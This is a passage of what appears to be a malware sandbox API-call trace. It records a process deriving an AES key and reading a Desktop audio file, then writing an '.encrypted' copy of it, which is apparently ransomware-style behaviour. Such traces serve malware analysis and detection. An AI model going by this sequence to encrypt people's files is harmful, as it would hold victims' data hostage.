lpsz="bool") returned 0x4 [0029.864] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.865] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0029.865] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.865] CryptDestroyHash (hHash=0x7c2100) returned 1 [0029.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bn6b0ldlyx0l0guv_ y.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.865] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.865] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0029.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0029.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0029.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.868] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0029.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bn6b0ldlyx0l0guv_ y.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0029.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0029.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0029.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0029.870] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.870] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0029.872] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x92e, lpOverlapped=0x0) returned 1 [0029.872] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1092e) returned 0x8affc0 [0029.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0029.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0029.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1092e) returned 0x8c08f8 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.874] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1092e) returned 0x8affc0 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.874] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.874] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.874] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1092e) returned 0x8affc0 [0029.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0029.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0029.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0029.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1092e) returned 0x8d1230 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.876] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0029.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0029.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0029.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.885] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0029.886] RtlAllocateHeap 